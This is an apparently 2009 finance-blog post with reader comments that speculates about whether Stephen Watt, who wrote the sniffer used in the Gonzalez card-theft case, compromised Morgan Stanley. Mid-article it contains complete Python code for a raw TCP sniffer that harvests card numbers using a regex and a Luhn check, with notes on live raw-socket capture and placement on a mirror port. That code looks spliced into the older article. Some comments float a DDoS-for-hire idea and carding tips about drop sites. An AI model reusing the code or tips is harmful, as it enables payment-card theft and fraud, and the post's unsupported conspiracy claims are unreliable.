
Was Morgan Stanley Compromised By Project Mayhem?

One of the key headlines these days has been the unmasking of what has been dubbed the biggest identity theft and credit card fraud case in history, allegedly spearheaded by one Albert Gonzalez, who was caught in a comparable scheme in 2003, promptly became an informant for the Secret Service, and turned over 30 of his hacking buddies. Six years later it is he who is in the hot seat, together with most of his associates, including one 25 year old Stephen Watt, who supposedly wrote the credit card sniffer software used to capture over 130 million card numbers from merchants such as TJX, Dave & Buster's and 7-Eleven, numbers which were subsequently sold for hefty sums to Eastern European purchasers. What is peculiar in all this is that apparently for the entire duration of this operation, Stephen was working in "Application infrastructure development and in house security toolkit development" at Morgan Stanley (earning $99,000 a year as a 21-23 year old programmer in 2004-2007), and subsequently took a brief position with Imagine Software, where he developed "real-time computer trading programs for financial firms." Did Stephen learn the tools of the trading game at MS, while at the same time hacking millions of credit cards, only to take what he learned from both ventures into a new operation, one that counts among its clients the Who's Who of Wall Street? Or, alternatively, did he use his packet sniffing skills at Morgan Stanley? The questions grow...

While the case against Gonzalez is rather clear cut, he apparently being a recidivist who should have been taken down the first time around, when the Secret Service got involved in his deal, that of Watt is less conclusive. According to Wired magazine, "[Gonzalez] spent $75,000 on a birthday party for himself and once complained that he had to manually count $340,000 in pilfered $20 bills because his counting machine broke. But while Gonzalez apparently lived high off ill-gotten gains, [Watt] sits broke and unemployed, his career in shambles, while awaiting sentencing for a piece of software he crafted for his friend."

To be sure Watt's involvement in the hacking industry has its roots in his past:

Though it’s unacknowledged by the prosecution and defense, Watt was once known in hacker circles as “Jim Jones” and “Unix Terrorist.” In the late 1990s and early 2000s, that hacker was part of a band of self-proclaimed black hats that opposed the publication of security vulnerabilities and resisted the hacking scene’s shift from recreational network intrusions to legitimate security research.

“I figured out his name years ago, Stephen Huntley Watt, and then the guy wound up getting indicted on the TJ Maxx thing,” says former hacker Kevin Mitnick.

Under the rubric Project Mayhem, the gang managed to hack into the accounts of a number of prominent “white hat” hackers and publish their private files and e-mails. At the 2002 DefCon hacker conference, Watt took the stage with two friends to personally share some of the hacked e-mails.

What exactly is the prosecution's case against Watt:

The Information alleges that WATT was a member of a conspiracy which, between 2003 and 2008, unlawfully gained electronic access to corporate computer networks using various techniques, downloaded customers’ credit and debit card information, and fraudulently used that information and sold the information to others for fraudulent use. The Information further alleges that WATT modified and provided a “sniffer” program used by the conspirators to monitor and capture the data crossing corporate computer networks.

The full sentencing memorandum against Watt is presented below (trust the United States of America to be unable to even get the name of the only defendant correct; one would imagine the SEC is somehow involved here):

 

For a more humane representation of Stephen Watt's actions we recommend reading the Sentencing Memorandum prepared by Watt's lawyer, Michael Farkas, presented below:

 

 

Yet, while Zero Hedge will not make any determinations with regard to a justification of Stephen's actions (although there is a certain soft spot for an individual who used a Project Mayhem moniker in his transgressions), the major issue here is what, if anything, Watt did while he was employed as a "software engineer" at Morgan Stanley, especially since the primary allegation against him by the government is that he created an (illegal) packet sniffer dubbed "blabla", and what skills he learned there (and possibly abused) to take to his next employer, Imagine Software, where, as the memorandum reveals, he worked on "software such as real-time computer trading programs for financial firms."

Notable is that the entire case against Watt revolves around his creation of a packet sniffer: a program that, by its simplest definition, captures the traffic passing over a network interface and lets its operator read whatever that traffic carries. From the Watt Memorandum:

A program known as a "sniffer" refers to a class of application that captures any type of data that travels across a communications network. "Packet sniffers" are the most commonly referenced, which are used to capture and often store data that travel across a local network or the Internet. Sniffers serve a wide variety of purposes and can be used in many sorts of legitimate research, diagnostics, and security-related scenarios, in addition to illegal data gathering... and from the footnote: Sniffers can also be appropriated for malicious activity, as they can also be used to capture information that travels across networks such as logins and passwords, transmitted files, and various forms of electronic conversations.

And the reason Watt is in this jam is the sniffer itself. Note what the memorandum says it did and did not do: "blabla" was not written with any particular target, or with credit card data, in mind; it blindly logged whatever crossed the wire, which leaves picking the card numbers out of the capture as a separate step:

The sniffer "blabla" involved in this case falls into this latter class of sniffers, which blindly logs any type of data. Specifically, it is known as a "raw TCP sniffer," which can be used to "sniff" incoming data to any sort of Internet server as it was not designed with the prescience of any target host computer or network.
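To make that distinction concrete, here is a minimal "raw TCP sniffer" of the kind the memorandum describes, written for this page as an added example (it is not blabla or any code from the case). It parses Ethernet/IPv4/TCP frames with no notion of a target host, keeps the payload, and only afterwards scans the capture for anything that looks like a card number, using the Luhn check to throw out false positives such as order ids. The frames it reads are constructed inline so the script runs offline; the addresses, ports, the HTTP-style POS message and the 4111... Visa test number are all assumed sample values.

```python
"""A blind raw TCP sniffer plus a separate card-number isolation pass.

Added example for this page, not code from the case.  Frames are constructed
below so it runs offline; on a live Linux box the same parser would be fed
from a raw socket (socket.AF_PACKET), which sees only its own segment."""
import re
import struct

ETH_HDR_LEN = 14
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6

# Candidate PANs: 13-19 digits, optionally separated by spaces or dashes.
PAN_RE = re.compile(rb"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum (ISO/IEC 7812); every real payment card number passes it."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def _ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def parse_frame(frame: bytes):
    """Return (src, dst, sport, dport, payload) for an Ethernet/IPv4/TCP frame,
    or None for anything else.  Nothing about the target is assumed."""
    if len(frame) < ETH_HDR_LEN:
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[ETH_HDR_LEN:]
    if len(ip) < 20:
        return None
    ver_ihl, _, total_len, _, _, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if (ver_ihl >> 4) != 4 or proto != IPPROTO_TCP or ihl < 20 or len(ip) < total_len:
        return None
    tcp = ip[ihl:total_len]
    if len(tcp) < 20:
        return None
    sport, dport, _, _, off_flags = struct.unpack("!HHIIH", tcp[:14])
    data_off = (off_flags >> 12) * 4
    return _ip_str(src), _ip_str(dst), sport, dport, tcp[data_off:]


def extract_pans(payload: bytes):
    """The isolation step: regex for candidates, then Luhn to drop noise."""
    found = []
    for m in PAN_RE.finditer(payload):
        digits = re.sub(rb"[ -]", b"", m.group()).decode()
        if luhn_ok(digits):
            found.append(digits)
    return found


def sniff(frames):
    """Run the blind parser over frames and return every (flow, PAN) hit."""
    hits = []
    for f in frames:
        parsed = parse_frame(f)
        if parsed is None:
            continue
        src, dst, sport, dport, payload = parsed
        for pan in extract_pans(payload):
            hits.append((f"{src}:{sport}->{dst}:{dport}", pan))
    return hits


def build_frame(src, dst, sport, dport, payload: bytes) -> bytes:
    """Construct a test frame (checksums left zero; the parser ignores them)."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, 1, 0, 5 << 12, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, IPPROTO_TCP, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split(".")))) + tcp
    return b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4) + ip


# Constructed sample traffic: a POS host posting a plaintext card number, an
# unrelated message whose 16-digit order id fails Luhn, and an IPv6 frame.
SAMPLE_FRAMES = [
    build_frame("10.1.2.30", "10.1.2.5", 51000, 8080,
                b"POST /auth HTTP/1.0\r\n\r\npan=4111-1111-1111-1111&exp=0911"),
    build_frame("10.1.2.31", "10.1.2.5", 51001, 8080,
                b"order_id=1234567812345678&item=lcd"),
    b"\x00" * 12 + b"\x86\xdd" + b"\x00" * 40,
]

if __name__ == "__main__":
    for flow, pan in sniff(SAMPLE_FRAMES):
        print(flow, pan)
```

Two practical points follow from it. The capture side is indifferent to what it sees, so a box like this placed on a segment carrying unencrypted card data needs no special knowledge of the victim; on a switched network it sees only its own port's traffic unless it sits on the host itself or on a mirror port. And the same extract_pans pass, run by a defender over their own captures, is the quickest way to answer the question raised in the comments below: whether anyone on your network is actually moving card numbers in clear text.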

For the conspiracy minded, let's recall that packet sniffing was one of the primary background strong suits of Sergey Aleynikov, of Goldman Sachs "market manipulation" allegation fame. One need not think too hard about how having non-public data in the field of High Frequency Trading (ignoring the concept of Flash orders for the purpose of this thought experiment) could provide a massive and profitable leg up to the entity that managed to (surreptitiously) control such packet sniffing.

Which raises the question: was Watt, while employed at Morgan Stanley between 2004 and 2007, a period bracketed on both sides by his alleged illegal activities in 2003-2008, using his knowledge of packet sniffers only in the context of his allegedly illegal scheme to capture credit card numbers with Gonzalez, or did his expertise render him more valuable to Morgan Stanley than the headlines would make it seem? Alternatively, did an unquestionably bright Watt notice weaknesses in MS' trading infrastructure, and if so, have these been disseminated? After all, it took just a hint of potential impropriety in the Aleynikov case to have the Feds arrest him days after Goldman became aware of his activity (not to mention a bail higher than that of "Sir" Allen Stanford).

An indication of this may be provided by some hacker disclosures on bulletin boards, where n0td3v writes that Watt is best known for "back dooring of the Qualys Vulnerability Scanner." An unverified forum claim, to be sure, but the fact that Watt actually did work at Qualys in 2001-2002 is not lost on us. Perhaps Watt's MO, when his skills were not being used directly for the benefit of his current employer, was to discover the weaknesses in its IT infrastructure with a view to subsequent abuse?

Yet it bears pointing out that Imagine Software, the firm Watt left for after quitting Morgan Stanley, counts among its clients such names as Credit Suisse, Deutsche Bank, Jefferies, Smith Barney, Millennium Management, PNC... and Goldman Sachs JBWere. From Imagine's About Us section:

Imagine’s reputation for delivering tangible competitive advantage is based upon proven innovation that enables users to stay abreast of the market. Imagine Software puts institutional-grade functionality, broad cross-asset instrument support, and the ability to employ any trading strategy in the hands of sell- and buy-side businesses of all sizes.

  • Introduced enterprise solution, Imagine Trading System, in 1993, and ASP solution, Derivatives.com, in 2000
  • Headquartered in New York with offices in London, Sydney, and Hong Kong
  • Thousands of users across major hedge funds, fund-of-funds, pension funds, brokerage firms and banks worldwide
  • Significant prime broker relationship with Credit Suisse
  • Relationships with other major prime brokers
  • Leading provider of on-demand derivative trading analytics, portfolio and risk management solutions
  • Winner of two #1 Risk Magazine Awards (equity trading and equity analytics) several years in a row

Whether Watt's potential transgressions are limited to the creation of the blabla packet sniffer, which was used to defraud numerous public companies out of hundreds of millions, or whether his unique skills were geared for something more now that the bright 7 foot tall hacker had found his way into the pinnacle of financial society, will likely remain unknown. However, Zero Hedge will follow the case (District Court of Massachusetts, 08-cr-10318) and eagerly await the release of the transcript of Watt's Sentencing Hearing, which should be made available to the public in mid-September (presumably severely redacted, just like the previously filed disclosure by Belopolsky and Volfbeyn against RenTec: wouldn't want those "trade secrets" leaking now, would we).

In conclusion, this case, which seems to have more loose ends unravel each and every day, could benefit from the prosecutors focusing not just on Watt's direct actions while collaborating with Gonzalez, but on whether there was any impropriety by the alleged perpetrator while employed as a programmer dealing with what by all accounts seems to be very intimate trading software at major Wall Street organizations.

 


Sat, 08/29/2009 - 15:50 | 52908 TomJoad

I guess the real question is, was he using his mad skillz for evil, or for EVIL?

Sat, 08/29/2009 - 19:43 | 53036 Anonymous

sounds more like eeevviilllll to me...

Sat, 08/29/2009 - 15:51 | 52909 Anonymous

I feel like this is grasping a bit.

Sat, 08/29/2009 - 16:21 | 52919 chumbawamba

I'll have to agree.  I see this as a guy who was writing software at MS for their (legitimate or otherwise) business needs but that could also be used universally for personal gain.  Corporate programmer by day, black hat fraudster by night.  That fits the description of probably 20% of network programmers today.

I am Chumbawamba, and I know of what I speak.

Sat, 08/29/2009 - 19:54 | 53045 Anonymous

Too naive.

He is a criminal. He is a hacker that used his skill for personal gains. Morgan Stanley's computer network has been compromised. If I were the head of the IT department I would clean all computers and servers. Stop any programs that were built or touched by him, and anything that looks suspicious I would close up in a heartbeat.

Sat, 08/29/2009 - 17:32 | 52947 Anonymous

You obviously have no clue what the implications of this are..

Sun, 08/30/2009 - 19:00 | 53373 acrneer (not verified)

So what about the "bear" signal end of 2006? And the bullish signal before the great plunge in 2008...

good articles; good articles 4 slow news day ..http://www..
hat tip: finance news & finance opinions

Sat, 08/29/2009 - 16:08 | 52916 Anonymous

i know i would be bitching too if i had to count 340,000 usd manually - who the fuck has time to count 17,000 bills???...what a total and complete crock...and where was the flunky??

Sat, 08/29/2009 - 16:31 | 52921 Anonymous

imagine how easy his job at Morgan Stanley was compared to his job sniffing credit card numbers, etc.

geez, he not only knew exactly all the pipelines to tap but had the encryption software in hand too.

Sat, 08/29/2009 - 16:43 | 52924 AN0NYM0US

China Investment Investing Billions in Hedge Funds

 

"China Investment Corp. had $297.5 billion in assets and had 87.4 percent of its global portfolio invested in cash and cash equivalents at the end of last year, the fund reported earlier this month."

http://www.bloomberg.com/apps/news?pid=20601087&sid=a4FINX22BV8c

Sat, 08/29/2009 - 16:43 | 52925 Anonymous

did he end up following the white rabbit?

Sat, 08/29/2009 - 16:45 | 52926 Anonymous

Packet sniffing + flash orders. And most probably that is how the technique was developed. Now it is all adding up. I have witnessed that first hand while watching the offer/bid on a graph. A regular linear time trade going sometimes very regularly with no direction, where the price suddenly collapses severely (and sometimes gets scary if you are long the stock), and suddenly and mysteriously it stops at a bid and starts climbing back (and sometimes with a vengeance!!!). I always wondered about it, until I read here about flash orders. And now it is more clear, packet sniffing as in order (which is nothing more than a packet in a computer) sniffing, makes perfect sense. So the question is now, will Mr Watt be sentenced to innocence if he can prove that his packet sniffing software has the same function as flash orders trade? Since the latter is perfectly endorsed by the law (until now) why not Mr. Watt's software too? And if he is found guilty, would flash trade be banned and people who implemented it brought to justice if it could be proved that it does the same function as Watt's software? Which is sniffing my credit card number, buying that Chinese doll and then turning around and selling to me for a couple of extra pennies?

Sat, 08/29/2009 - 19:53 | 53042 D.O.D.

+10

Sat, 08/29/2009 - 16:47 | 52928 Anonymous

Miami attorney Michael Farkas, who founded SkyWay Aircraft, which owned the DC9 busted in Mexico 18 months ago with 5.5 tons of cocaine aboard?

Sat, 08/29/2009 - 19:45 | 53037 Anonymous

i am sure it was all a misunderstanding - an
administrative error with an internal investigation
to follow to see if there was any wrongdoing
or procedural improvements to be implemented...

Sat, 08/29/2009 - 20:10 | 53059 Anonymous

Apparently not. That was Michael D. Farkas, this one's Michael C.

http://www.politicalfriendster.com/rateConnection.php?id1=6330&id2=3698

Sat, 08/29/2009 - 17:08 | 52939 Anonymous

what I want to know is how shitty does an IT dept need to be that it doesn't encrypt its traffic? Who is transmitting card data in open text? You can sniff all day but if you can't break the encryption then all you are going to get is garbage.

Sat, 08/29/2009 - 19:08 | 53013 Anonymous

I agree with you. 99.999999999999% of all credit card info is encrypted. Packet sniffing is worth CRAP since most segments are on switches and those switches only show that leg's traffic.

Sat, 08/29/2009 - 19:47 | 53039 Anonymous

which raises the very interesting question
of decryption technology....surely you know
about promis....i suspect that the traffic was
indeed encrypted but that the villains could
readily decrypt it thanks to our friends
at the fbi and cia...

Sun, 08/30/2009 - 09:01 | 53274 Anonymous

A lot of the shitty PCI certified retail CC processing software out there (ISD for example) makes bad assumptions regarding a lot of their endpoints as being "secured with compensating controls". In reality they are not. Thankfully a lot of the devices now do message content encryption from device (Verifone or Ingenico) to the processing layer of at least the CC# itself. But that does not help you if the POS software then does something stupid with that number on the receiving end over an insecure network.

Sat, 08/29/2009 - 17:16 | 52942 thegreatsatan

you have to have a seriously incompetent IT staff to allow credit card information to pass through the tubes in clear text. you wouldn't need a custom sniffer to get that information.

honestly, if i had the resources available to me, i would find a way to ddos the nets where the flash trades are being done, then sell that service to the highest bidder. think of the havoc you could create by bringing down a competitors ability to snap off their trades

Sat, 08/29/2009 - 18:14 | 52969 wejn

Not true. You could get the certs/keys, sniff encrypted traffic and decrypt on-the-fly.

And for that you'd most likely need custom sniffer, 'cos tcpdump won't cut it.

Sat, 08/29/2009 - 19:52 | 53041 Anonymous

this is all speculation....it is important
to know the security standards on the compromised
servers and if indeed hackers could access
the certificates and keys....

facts are more interesting...

Sat, 08/29/2009 - 17:50 | 52957 Careless Whisper

Meet Stephen Watt:

http://www.wired.com/images_blogs/threatlevel/2009/06/swatt.jpg

Looks kinda cool, like the kind of guy I'd like to have a few beers with. Notice the necklace. I'm going to take a wild guess and say that it's a reference to cDc which is cultDeadcow. I like Stephen Watt.

The problem with this story is first, that maybe he did nothing wrong while at MorganStanley, but obviously the possibility exists that they or the evil empire at 85 Broad (soon to be 200 West) could design some sniffer packets for bad bad things and no one would know.

This story about the 200 billion credit cards stolen is pure hype. IT'S AN ILLUSION. Designed to focus on the small hacker, the pot dealer on the corner if you will. Meantime $100 million per day gets stolen by Mr. Big Time and his empire of computer programmers. Only 2 losing trading days out of 63, better record than Bernie.

Think this is far fetched do you? Conspiracy theory over here? Well HERE'S THE PROOF, from none other than Microsoft itself (yes I know it's ironic). "Nobody Sells Gold For The Price Of Silver"

 http://research.microsoft.com/pubs/80034/nobodysellsgoldforthepriceofsilver.pdf

 

Sat, 08/29/2009 - 18:17 | 52971 Anonymous

Did you even read that academic paper you posted?

It doesn't suggest that the market doesn't exist. It suggests that the IRC market isn't where most of the transactions occur, which is entirely correct. There are "secret" IRC servers that the efnet channels are basically fronts for. That's why nobody ever talks on efnet.

The reason the dumps go for so low per account is you can't use them easily. Getting the information is only half of the equation.

For instance, if you have a corporate bank account number, you have to fraudulently contract the services of an ACH capable finance firm, usually a payroll firm, to actually get the money out of there. That's not easy to do.

Carding is difficult too because you have to specify a physical drop site and then camp it out for your goods to arrive and hope you aren't being watched.

This economy is real, and the fact one of these guys worked for Morgan Stanley should concern you.

Sun, 08/30/2009 - 11:17 | 53309 Anonymous

Yur doin it rong.

The drop site is your ebay high bidder, or your "work at home" flunky.

Sun, 08/30/2009 - 13:03 | 53337 Anonymous

stick to the point, not mentioning every possibility. the person i am responding to claims that this economy doesn't exist.

you think a hacker cares about such boring activities?

thats why there exists a division of labor

Mon, 08/31/2009 - 10:11 | 53809 Careless Whisper

Anon 52971, I read the paper again, and I think your interpretation is incorrect. The paper says that a black market for stolen credit card numbers certainly exists, however, the ASKING price of those (individual) card numbers ranges from 0.50 to $12. Only a small percentage get sold. That's because they are hard to monetize.

The paper makes clear that companies like Symantec have a vested interest in exaggerating the amount of losses because of the security software they sell.

I would argue that other vested interests are exaggerating this case because it diverts attention from other questionable activities, specifically on Wall Street.

Yes, I do agree with your concern about Morgan Stanley. I don't subscribe to the argument that a hacker can wear a white hat during the day and a black hat at night.

Regarding the specific case of Stephen Watt, he supplied a packet sniffer to his friend. He did not get paid for the sniffer or anything else. He should NOT go to jail.

 

Sat, 08/29/2009 - 18:55 | 53003 Anonymous

the_uT hates cDc, but whatever.

Sat, 08/29/2009 - 19:13 | 53008 Hephasteus

Yep. Well said. If you're not focusing on the problem then it can continue on.

Sat, 08/29/2009 - 19:56 | 53047 Anonymous

i agree that someone may have been thrown
under the bus
but if there is a larger conspiracy or bigger
fish to fry then the suspect in this
case is morgan stanley - not goldman sachs...

there is no evidence linking watt to gs....

Sun, 08/30/2009 - 09:21 | 53282 Anonymous

a reference to cDc

Agreed. Those were the days. During Defcon the Alexa hotel was a recruiting ground for corporate America and the feds but we could care less. We were all too busy trying to showcase skills at Capture the Flag.

Sat, 08/29/2009 - 20:20 | 53068 James Beeland Rogers Jr.

I studied this case at University of Florida, Criminology Department. This thing is huge and deep... the Russians are heavily involved...

Sun, 08/30/2009 - 08:00 | 53264 Ben_the_Bald

Shhhh!

Users from Russia constitute the 5th largest group of readers of Zero Hedge. That's very unusual for a USA-based "finance" blog.

Sun, 08/30/2009 - 12:02 | 53321 Veteran

careful, I bet ol Obama is just waiting for an opportunity to restart the Cold War.  Voila, unemployment solved.  Like that movie Canadian Bacon.  Plus there's a shitload of crazy Russians in my neighborhood.  Infiltration?

Sat, 08/29/2009 - 22:58 | 53167 Careless Whisper

Beg to differ James. What are the Russians doing with all those credit card numbers?  A Samsung 52" LCD for everyone? Don't you think the banks have software to flag a purchase shipped to Russia or anywhere other than the cardholders address? The going rate for stolen card numbers is quite low because they are hard to convert to currency. The number of cards stolen may be large but the amount of money stolen is small. These hackers are the least skilled and certainly not the Tony Montana of hacking.
The big money is on Wall Street.

Sun, 08/30/2009 - 13:07 | 53342 Anonymous

the unix terrorist is the tony montana of hacking.

Sun, 08/30/2009 - 02:34 | 53221 michigan independant

Think gatekeeper and you're a step closer. This is old news from legacy network data traffic we were responsible for then. We had bot wars then and still today with our left-brained fellows. Then we allocated, decompiled, sent back and poof, oh you needed that firmware for your BIOS, sorry - ping hehe. And just rewrapped news for today. Treasury, Justice, et al; it was just a matter of time for Marshal Dillon to arrest a clever individual. This case just took time as they all do. Sometimes I miss Unix but there are so many issues I sold my position. It was fun working with Lucent and AT&T, Brooks Communication bought by MCI and onward with innovation. Like the site conveys, change is on the inside. IServ ended up with our creation but I learned, earned and moved on.

Sun, 08/30/2009 - 05:44 | 53253 r0n161616
Sun, 08/30/2009 - 20:11 | 53520 Hephasteus

Rolfe made it on Reuters. That kid is a badass thinker and writer.

Sun, 08/30/2009 - 08:22 | 53266 Anonymous

For what it's worth, Nancy Gertner is exactly the type of judge you'd want on a case like this... I can't think of anyone on the Boston federal bench who is less likely to humor or go along with the preferences of an IB if there's a question of a Larger Scandal.

Sun, 08/30/2009 - 09:25 | 53288 Anonymous

Tyler, why don't you guys pick up where the 60 minutes piece left off and see what you can dig up on Morgan Stanley's alleged manipulation of the oil market. Like following the little hacker kid, just follow the ex-Enron employees to the stink. It's a pretty common theme around here that the equity markets are manipulated, but why don't you try and tackle the commodities paper scam.

Mon, 08/31/2009 - 20:55 | 54663 Ben_the_Bald

Excellent point!

Sun, 08/30/2009 - 11:07 | 53306 Anonymous

You can bet if Mr Watt was facilitating MS in doing anything illegal, he will sing like a bird to the feds. This is assuming the feds are not compromised by political quashing of the evidence.

Sun, 08/30/2009 - 13:17 | 53352 Anonymous

It's another case of prosecutors attempting to screw everyone in sight, even those who had only a superficial role in this scam.

The sniffer that Watt supposedly "provided" is a common and frequently used tool, available for download at a number of public web sites.
See: http://www.winpcap.org/
The software simply records network packets that pass by on the network that it is connected to - this is commonly used to measure network utilization, and to perform throttling (by cable internet providers).

The prosecutors don't care about completely ruining someones life and work prospects. They just want another "kill" on their resumes.

That's what has become of the "justice system".

Sun, 08/30/2009 - 19:00 | 53370 acrneer (not verified)
Sun, 08/30/2009 - 14:53 | 53392 Anonymous

I saw the_UT's talk at DefCon. The title of the talk was "Security Wolves Among Us".

Mon, 08/31/2009 - 00:51 | 53684 channel_zero

Conflating jobs at financial institutions into some kind of paranoid fantasy is a waste of energy.

1. Those jobs pay well.  Not exciting, but pay well.

2. Cracking payment backends is mostly an intellectual challenge that's exciting for some that have mastered computers.

 

Mon, 08/31/2009 - 12:01 | 53897 Anonymous

>Application infrastructure development and in house security toolkit development

This is the department at Morgan Stanley that writes tools for the actual trading system developers to use.

No one in that department is exposed to the business or the trading desk - those guys are back room weirdos who aren't allowed anywhere near the traders.

He may have picked up some technical skills while he was at MS, but he won't have been anywhere near any trading engines or anything that was dealing with actual business data.
